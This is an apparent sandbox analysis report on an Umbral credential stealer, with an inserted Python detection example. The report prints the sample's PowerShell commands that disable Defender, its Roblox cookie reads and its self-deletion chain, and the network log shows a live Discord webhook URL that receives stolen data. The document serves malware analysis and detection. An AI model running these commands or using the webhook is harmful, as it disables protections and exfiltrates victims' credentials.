Analysis

  • max time kernel
    436s
  • max time network
    438s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    25/03/2025, 19:56 UTC

General

  • Target

    Umbral.exe

  • Size

    229KB

  • MD5

    fdb6c9cdf5605efda3e45942dad869d4

  • SHA1

    8022afe157b98ad5fd5ead6f17ce35caff40b168

  • SHA256

    bea3c8ebdb0c815aff349ef6ad6f0d92751ae62e4ced9ac2c68582d4e9d1c0af

  • SHA512

    434a552c3dbdf7024f4a557ce9f01f755037aa303da03ed7752c9d1acd6c5fa050deef34983c7f491237a5c7adb3317db279b6e8e0bd3dab8bc0547dc031455e

  • SSDEEP

    6144:lloZM+rIkd8g+EtXHkv/iD4ggxVFzQEbsCzFQMpf7b8e1mAUi:noZ1L+EP8ggxVFzQEbsCzFQMpXz

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an open-source modular stealer written in C#.

  • Umbral family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine the installed video card.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
    "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4004
    • C:\Windows\SYSTEM32\attrib.exe
      "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
      2⤵
      • Views/modifies file attributes
      PID:1896
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:6060
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:5212
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4592
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1144
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:1824
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3540
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      PID:3400
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      PID:1204
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      2⤵
      • Detects videocard installed
      PID:3424
    • C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      2⤵
      • System Network Configuration Discovery: Internet Connection Discovery
      • Suspicious use of WriteProcessMemory
      PID:3840
      • C:\Windows\system32\PING.EXE
        ping localhost
        3⤵
        • System Network Configuration Discovery: Internet Connection Discovery
        • Runs ping.exe
        PID:3836
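The Signatures list and the process tree above describe one chain driven from a single parent: a Defender exclusion for its own path, a Set-MpPreference tamper-down, attrib +h +s on its own file, two reads of the Roblox .ROBLOSECURITY cookie, WMIC hardware fingerprinting, and finally a cmd /c ping && del self-deletion. What a detection engineer wants from that is not six isolated alerts but the correlation. The following is an added example, not code from the sandbox report or from the Umbral project: the events are constructed from the command lines in the tree (a real pipeline would feed Sysmon Event ID 1 or Windows Security 4688 records), each is run through one rule per behaviour, and hits are then grouped by parent PID so that the verdict depends on the combination rather than on any single command.

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    cmdline: str


PS = '"powershell.exe" '
# Constructed from the process tree in the report (PIDs as logged there; the
# parent, PID 4004, is Umbral.exe). Quoting is kept exactly as the sandbox shows it.
SAMPLE_EVENTS = [
    ProcEvent(4004, 0, r'"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"'),
    ProcEvent(1896, 4004, r'"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"'),
    ProcEvent(6060, 4004, PS + r"Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'"),
    ProcEvent(5212, 4004, PS + "Set-MpPreference -DisableIntrusionPreventionSystem $true "
              "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
              "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
              "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
              "-SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"),
    ProcEvent(4592, 4004, PS + r"Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"),
    # 'HKLN:' is a typo in the malware itself, so the rule keys on the value name, not the hive.
    ProcEvent(1144, 4004, PS + r"Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"),
    ProcEvent(1824, 4004, '"wmic.exe" os get Caption'),
    ProcEvent(3540, 4004, '"wmic.exe" computersystem get totalphysicalmemory'),
    ProcEvent(3400, 4004, '"wmic.exe" csproduct get uuid'),
    ProcEvent(3424, 4004, '"wmic" path win32_VideoController get name'),
    ProcEvent(3840, 4004, r'"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause'),
    # Constructed benign noise: an admin reading Defender settings from an interactive shell.
    ProcEvent(7000, 6500, PS + "Get-MpPreference"),
]

# One pattern per behaviour, applied to the full command line (case-insensitive).
RULES = {
    "defender_exclusion":  r"Add-MpPreference\b.*-ExclusionPath",
    "defender_disable":    r"Set-MpPreference\b.*(-Disable\w+\s+\$true|-MAPSReporting\s+Disabled|-SubmitSamplesConsent)",
    "hide_own_file":       r'attrib(\.exe)?"?\s+(?=.*\+h)(?=.*\+s)',
    "roblox_cookie_theft": r"\.ROBLOSECURITY\b",
    "wmic_fingerprint":    r'wmic(\.exe)?"?\s+(os\s+get|computersystem\s+get|csproduct\s+get|path\s+win32_videocontroller)',
    "self_delete_chain":   r'cmd(\.exe)?"?\s+/c\s+ping\b.*&&\s*del\s+',
}
COMPILED = {name: re.compile(pat, re.IGNORECASE) for name, pat in RULES.items()}

# Behaviours that have no routine admin explanation when they share a parent.
HIGH_CONFIDENCE = {"defender_disable", "hide_own_file", "self_delete_chain"}


def match_rules(ev: ProcEvent) -> list[str]:
    """Names of the rules whose pattern matches this event's command line."""
    return [name for name, rx in COMPILED.items() if rx.search(ev.cmdline)]


def correlate(events: list[ProcEvent]) -> dict[int, set[str]]:
    """Group rule hits by parent PID; a stealer drives every stage from one process."""
    by_parent: dict[int, set[str]] = defaultdict(set)
    for ev in events:
        for name in match_rules(ev):
            by_parent[ev.ppid].add(name)
    return dict(by_parent)


def verdict(events: list[ProcEvent]) -> list[int]:
    """Parent PIDs that tamper with Defender AND show at least two high-confidence behaviours."""
    tamper = {"defender_exclusion", "defender_disable"}
    return sorted(ppid for ppid, names in correlate(events).items()
                  if names & tamper and len(names & HIGH_CONFIDENCE) >= 2)


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        hits = match_rules(ev)
        if hits:
            print(f"pid={ev.pid} ppid={ev.ppid} {', '.join(hits)}")
    print("verdict: malicious parents", verdict(SAMPLE_EVENTS))
```

Each rule on its own is noisy: installers add exclusions, inventory scripts run wmic csproduct get uuid, and a help desk may disable real-time monitoring for a minute. The verdict therefore requires Defender tampering plus at least two of the disable/hide/self-delete behaviours under the same parent, which is the shape the tree above shows and which an admin session does not produce. The Roblox rule matches on the value name rather than the registry path because the second read in the tree uses the nonexistent HKLN: hive; the malware's own typo would otherwise slip past a path-based rule.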

    Network

    • DNS (US)
      gstatic.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      gstatic.com
      IN A
      Response
      gstatic.com
      IN A
      142.250.187.227
    • GET (GB)
      https://gstatic.com/generate_204
      Umbral.exe
      Remote address:
      142.250.187.227:443
      Request
      GET /generate_204 HTTP/1.1
      Host: gstatic.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 204 No Content
      Content-Length: 0
      Cross-Origin-Resource-Policy: cross-origin
      Date: Tue, 25 Mar 2025 19:57:10 GMT
      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
    • DNS (US)
      ip-api.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      ip-api.com
      IN A
      Response
      ip-api.com
      IN A
      208.95.112.1
    • GET (US)
      http://ip-api.com/json/?fields=225545
      Umbral.exe
      Remote address:
      208.95.112.1:80
      Request
      GET /json/?fields=225545 HTTP/1.1
      Host: ip-api.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 200 OK
      Date: Tue, 25 Mar 2025 19:57:13 GMT
      Content-Type: application/json; charset=utf-8
      Content-Length: 191
      Access-Control-Allow-Origin: *
      X-Ttl: 60
      X-Rl: 44
    • DNS (US)
      g.bing.com
      Remote address:
      8.8.8.8:53
      Request
      g.bing.com
      IN A
      Response
      g.bing.com
      IN CNAME
      g-bing-com.ax-0001.ax-msedge.net
      g-bing-com.ax-0001.ax-msedge.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • GET (US)
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MUID=2EC3AC9E892B69770BB8B9248890688C; domain=.bing.com; expires=Sun, 19-Apr-2026 19:57:14 GMT; path=/; SameSite=None; Secure; Priority=High;
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F6F7930FF6A24D34B09844B54ECDADA8 Ref B: LON04EDGE0906 Ref C: 2025-03-25T19:57:14Z
      date: Tue, 25 Mar 2025 19:57:13 GMT
    • GET (US)
      https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2EC3AC9E892B69770BB8B9248890688C
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      set-cookie: MSPTC=CeTrAqeKGmmxlatypEf0wdKzRGnXK8GvHTdqTB2PeEw; domain=.bing.com; expires=Sun, 19-Apr-2026 19:57:14 GMT; path=/; Partitioned; secure; SameSite=None
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: C83C6D4A400446F5ACE94EFB7E7BD42A Ref B: LON04EDGE0906 Ref C: 2025-03-25T19:57:14Z
      date: Tue, 25 Mar 2025 19:57:13 GMT
    • GET (US)
      https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid=
      Remote address:
      150.171.27.10:443
      Request
      GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=44016938df094cccb94fcd0005713cb2&localId=w:21C1CCEE-160B-F796-E0D9-10C0675E4A84&deviceId=6896216935942425&anid= HTTP/2.0
      host: g.bing.com
      accept-encoding: gzip, deflate
      user-agent: WindowsShellClient/9.0.40929.0 (Windows)
      cookie: MUID=2EC3AC9E892B69770BB8B9248890688C; MSPTC=CeTrAqeKGmmxlatypEf0wdKzRGnXK8GvHTdqTB2PeEw
      Response
      HTTP/2.0 204
      cache-control: no-cache, must-revalidate
      pragma: no-cache
      expires: Fri, 01 Jan 1990 00:00:00 GMT
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      access-control-allow-origin: *
      x-cache: CONFIG_NOCACHE
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: F23F641F3F0B45ABB9222FE8711F2FAD Ref B: LON04EDGE0906 Ref C: 2025-03-25T19:57:14Z
      date: Tue, 25 Mar 2025 19:57:13 GMT
    • DNS (US)
      discord.com
      Umbral.exe
      Remote address:
      8.8.8.8:53
      Request
      discord.com
      IN A
      Response
      discord.com
      IN A
      162.159.128.233
      discord.com
      IN A
      162.159.138.232
      discord.com
      IN A
      162.159.135.232
      discord.com
      IN A
      162.159.136.232
      discord.com
      IN A
      162.159.137.232
    • POST (US)
      https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw
      Umbral.exe
      Remote address:
      162.159.128.233:443
      Request
      POST /api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: application/json; charset=utf-8
      Host: discord.com
      Content-Length: 969
      Expect: 100-continue
      Connection: Keep-Alive
      Response
      HTTP/1.1 204 No Content
      Date: Tue, 25 Mar 2025 19:57:15 GMT
      Content-Type: text/html; charset=utf-8
      Connection: keep-alive
      Set-Cookie: __dcfduid=594d31ec09b311f0bdda9a151f89b0bf; Expires=Sun, 24-Mar-2030 19:57:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 4
      x-ratelimit-reset: 1742932636
      x-ratelimit-reset-after: 1
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1DAtN9l%2BUx97lzExSownMLquLp4bmtTUX98gRUDjXCzIWOL%2FI5sLpTbjqif0jfO%2BezkELILlH5YDIUfCR3976VvVSe9l1pEtmT%2FpL1pTO%2FmF%2B78rRxPRIaTS5MQK"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Set-Cookie: __sdcfduid=594d31ec09b311f0bdda9a151f89b0bfc3a7ad99608f2fcfdcdf3170228a60d59b3f4b3eaadb220d519b7c82e22aacdf; Expires=Sun, 24-Mar-2030 19:57:15 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
      Set-Cookie: __cfruid=7d1571c01534b02cdf8f5299a4d20b1925023cb3-1742932635; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Set-Cookie: _cfuvid=Z2E2I5pD29tJWB8tMP6tR6U3zLdmFwrAOIzLqF4dHE4-1742932635096-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
      Server: cloudflare
      CF-RAY: 9260f9e6dee67698-LHR
    • POST (US)
      https://discord.com/api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw
      Umbral.exe
      Remote address:
      162.159.128.233:443
      Request
      POST /api/webhooks/1354174093003329598/RcMwCs1pKWptqNfuG-bnbpQYHfvzrhYHkp-JQyQL19RLBiyUZN0PzH5agHDx098fepIw HTTP/1.1
      Accept: application/json
      User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
      Content-Type: multipart/form-data; boundary="07b6b1a5-a0cd-41cb-89a8-349c39eaf3fc"
      Host: discord.com
      Cookie: __dcfduid=594d31ec09b311f0bdda9a151f89b0bf; __sdcfduid=594d31ec09b311f0bdda9a151f89b0bfc3a7ad99608f2fcfdcdf3170228a60d59b3f4b3eaadb220d519b7c82e22aacdf; __cfruid=7d1571c01534b02cdf8f5299a4d20b1925023cb3-1742932635; _cfuvid=Z2E2I5pD29tJWB8tMP6tR6U3zLdmFwrAOIzLqF4dHE4-1742932635096-0.0.1.1-604800000
      Content-Length: 427403
      Expect: 100-continue
      Response
      HTTP/1.1 200 OK
      Date: Tue, 25 Mar 2025 19:57:15 GMT
      Content-Type: application/json
      Transfer-Encoding: chunked
      Connection: keep-alive
      strict-transport-security: max-age=31536000; includeSubDomains; preload
      x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
      x-ratelimit-limit: 5
      x-ratelimit-remaining: 4
      x-ratelimit-reset: 1742932636
      x-ratelimit-reset-after: 1
      vary: Accept-Encoding
      via: 1.1 google
      alt-svc: h3=":443"; ma=86400
      cf-cache-status: DYNAMIC
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gQAYyUmTPOCq27nBITOVCEUiXtrfzcxwooHoHbfB7l3%2BVlKdKRRuLyCDPNxRibWFMqT231uZoVYOOcHMkvQP%2BrxmXdhS4PRbYdgpYXB1Ky5tpscNU0oU2AeH8qBR"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      X-Content-Type-Options: nosniff
      Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
      Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable
      Server: cloudflare
      CF-RAY: 9260f9ea08fc7698-LHR
    • DNS (US)
      tse1.mm.bing.net
      Remote address:
      8.8.8.8:53
      Request
      tse1.mm.bing.net
      IN A
      Response
      tse1.mm.bing.net
      IN CNAME
      mm-mm.bing.net.trafficmanager.net
      mm-mm.bing.net.trafficmanager.net
      IN CNAME
      ax-0001.ax-msedge.net
      ax-0001.ax-msedge.net
      IN A
      150.171.27.10
      ax-0001.ax-msedge.net
      IN A
      150.171.28.10
    • GET (US)
      https://tse1.mm.bing.net/th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360526659_1DEB5NSYP58G2E8T3&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 843567
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 0E409839069D430AAF4F77EF3E6653F9 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • GET (US)
      https://tse1.mm.bing.net/th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360433542_1UJC4903W7XNIUU73&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 688476
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 995BCF98CE5D4B16B75064F7F953ABEF Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • GET (US)
      https://tse1.mm.bing.net/th?id=OADD2.10239339388161_17PDPNJBHCJYF0MEC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239339388161_17PDPNJBHCJYF0MEC&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 586035
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: E99611C5731842BAA0360402F6805071 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • GET (US)
      https://tse1.mm.bing.net/th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360433543_1F4HJPO10Z3VYH0SK&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
      user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
      Response
      HTTP/2.0 200
      cache-control: public, max-age=2592000
      content-length: 871109
      content-type: image/jpeg
      x-cache: TCP_HIT
      access-control-allow-origin: *
      access-control-allow-headers: *
      access-control-allow-methods: GET, POST, OPTIONS
      timing-allow-origin: *
      report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
      nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
      accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
      x-msedge-ref: Ref A: 56BB06C694F2440090C98EAE4FD35488 Ref B: LON04EDGE0608 Ref C: 2025-03-25T19:57:46Z
      date: Tue, 25 Mar 2025 19:57:46 GMT
    • GET (US)
      https://tse1.mm.bing.net/th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
      Remote address:
      150.171.27.10:443
      Request
      GET /th?id=OADD2.10239360526658_1O3WYEZK6VX7G9BK6&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
      host: tse1.mm.bing.net
      accept: */*
      accept-encoding: gzip, deflate, br
